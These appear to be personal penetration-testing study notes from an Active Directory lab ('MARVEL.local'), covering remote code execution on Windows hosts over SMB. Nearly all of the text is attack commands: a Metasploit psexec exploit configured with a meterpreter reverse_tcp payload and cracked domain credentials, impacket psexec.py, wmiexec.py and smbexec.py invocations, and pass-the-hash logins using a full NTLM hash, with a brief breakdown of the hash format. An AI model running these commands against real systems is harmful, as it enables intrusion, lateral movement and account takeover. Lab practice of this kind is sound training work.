- Do it with the cracked password (LLMNR and Cracking captured Hashes)
Metasploit
search psexec
use 4 #(exploit smb psexec)
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.218.138
set smbdomain MARVEL.local
set smbuser fcastle
set smbpass Password1
options #to review everything
show targets
set target 1 #not needed, just as a conceptpsexec.py:
psexec.py MARVEL/fcastle:'Password1'@192.168.218.138
OR
psexec.py MARVEL/fcastle:@192.168.218.139
#and password when promptedpsexec.py administrator@192.168.218.139 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f- Do it with a hash (SMB Relay Attacks (NTLM))
set smbuser administrator
unset smbdomain
set smbpass aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04fHash explained:
Hash: whole hash is needed for relay or passing the hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::LM:
aad3b435b51404eeaad3b435b51404eeNT: (only need this portion for cracking)
7facdc498ed1680c4fd1448319a8c04fif psexec is getting blocked, you can use:
wmiexec.py administrator@192.168.218.138 -hashes 7facdc498ed1680c4fd1448319a8c04f
OR
smbexec.py administrator@192.168.218.138 -hashes 7facdc498ed1680c4fd1448319a8c04f